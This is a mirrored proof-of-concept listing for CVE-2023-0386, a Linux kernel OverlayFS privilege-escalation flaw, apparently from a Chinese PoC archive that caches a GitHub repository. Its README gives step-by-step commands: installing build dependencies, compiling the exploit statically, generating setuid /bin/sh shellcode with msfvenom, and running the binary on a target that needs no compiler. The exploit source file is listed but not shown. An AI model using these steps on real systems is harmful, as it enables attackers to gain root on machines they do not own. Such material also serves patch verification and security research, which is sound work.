CVE-2023-0386 PoC — Linux kernel 安全漏洞

Source

https://github.com/EstamelGG/CVE-2023-0386-libs

Associated Vulnerability

Title:Linux kernel 安全漏洞 (CVE-2023-0386)
Description:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel存在安全漏洞，该漏洞源于在 Linux kernel的 OverlayFS 子系统中发现了未经授权访问，用户可以将一个有执行能力的文件从一个 nosuid 挂载复制到另一个挂载，这个 uid 映射错误允许用户升级他们在系统上的权限。

Description

CVE-2023-0386 包含所需运行库

Readme

安装编译环境

```bash
sudo apt install -y gcc libfuse-dev pkg-config
```

编译 exp

```bash
gcc -Wall CVE-2023-0386.c `pkg-config fuse --cflags --libs` -D_FILE_OFFSET_BITS=64 -o CVE-2023-0386-exp -static -lfuse
```

生成 shellcode

```
msfvenom -p linux/x86/exec CMD=/bin/sh PrependSetuid=True -f elf -o shellcode.elf && xxd -i -c 8 shellcode.elf

xxd -i -c 8 shellcode.elf
```

目标执行，**不需要要求目标安装 gcc 等环境**

```
chmod +x CVE-2023-0386-exp && ./CVE-2023-0386-exp
```

File Snapshot


 [4.0K]  /data/pocs/c2d81953522039087741af6da1282e55e62d1fb0
├── [6.6K]  CVE-2023-0386.c
└── [ 509]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!